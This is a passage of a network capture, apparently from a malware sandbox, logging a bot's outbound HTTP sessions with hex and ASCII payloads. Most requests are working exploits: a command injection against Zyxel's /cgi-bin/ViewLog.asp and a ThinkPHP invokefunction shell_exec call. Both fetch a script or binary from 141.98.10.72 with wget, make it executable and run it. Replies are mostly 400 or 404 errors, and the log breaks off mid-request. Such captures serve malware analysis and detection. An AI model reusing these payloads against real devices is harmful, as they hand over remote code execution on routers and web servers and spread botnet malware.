                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:21.816121101 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            247192.168.2.234198894.121.55.1138080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:21.817805052 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            248192.168.2.233511085.239.227.578080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:21.955092907 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:22.164572954 CET404INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:28:22 GMT
                                                            Server: Apache
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            249192.168.2.234844431.31.25.758080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:22.017096996 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            250192.168.2.233294694.120.31.1278080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:22.037857056 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            251192.168.2.235687094.121.40.298080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:22.039165974 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            252192.168.2.234846431.31.25.758080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:22.486823082 CET268INHTTP/1.0 400 Bad Request
                                                            Server: httpd
                                                            Date: Wed, 14 Feb 2024 08:28:22 GMT
                                                            Content-Type: text/html
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            253192.168.2.2334418112.29.198.8880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:22.769186974 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:23.127968073 CET521INHTTP/1.1 400 Bad Request
                                                            Server: Byte-nginx
                                                            Date: Wed, 14 Feb 2024 08:28:22 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 230
                                                            Connection: close
                                                            via: cache01.ahhncm11
                                                            x-request-ip: 81.181.57.74
                                                            x-tt-trace-tag: id=5
                                                            x-response-cinfo: 81.181.57.74
                                                            x-response-cache: miss
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 42 79 74 65 2d 6e 67 69 6e 78 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr/>Powered by Byte-nginx<hr><center>tengine</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            254192.168.2.2342870112.46.49.15980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:22.798197031 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            255192.168.2.2342878112.46.49.15980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:23.192538977 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:23.587155104 CET189INHTTP/1.1 404 Not Found
                                                            Content-Length: 0
                                                            X-NWS-LOG-UUID: 10951030289777879770
                                                            Connection: close
                                                            Server: ECDN_D2
                                                            Date: Wed, 14 Feb 2024 08:28:23 GMT
                                                            X-Cache-Lookup: Return Directly


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            256192.168.2.235794495.179.136.13280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:23.324353933 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:23.529860973 CET182INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:28:23 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 11
                                                            Connection: close
                                                            Data Raw: 42 61 64 20 72 65 71 75 65 73 74
                                                            Data Ascii: Bad request


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            257192.168.2.235525295.217.229.22680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:23.339229107 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:23.559247017 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.25.3
                                                            Date: Wed, 14 Feb 2024 08:28:23 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.3</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            258192.168.2.235029495.68.115.4480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:23.348382950 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:23.921935081 CET64INHTTP/1.1 400 Bad Request
                                                            Connection: Keep-Alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            259192.168.2.234725895.132.214.9580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:23.357065916 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:23.595135927 CET339INHTTP/1.0 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 11:28:23 GMT
                                                            Server: Boa/0.94.14rc21
                                                            Accept-Ranges: bytes
                                                            Connection: close
                                                            Content-Type: text/html; charset=ISO-8859-1
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            260192.168.2.234693494.123.54.1738080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:24.564100981 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            261192.168.2.233658294.121.120.2288080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:24.564161062 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            262192.168.2.234503494.121.128.1048080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:24.564203024 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            263192.168.2.235445262.29.55.2538080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:24.564224958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            264192.168.2.234852094.121.199.638080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:24.564270020 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            265192.168.2.233588062.210.205.758080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:25.507433891 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:25.711322069 CET294INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:28:25 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 146
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            266192.168.2.234849431.136.214.1718080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:25.528836012 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:28.607363939 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:34.750612974 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:46.781907082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:11.865381002 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:01.010529041 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
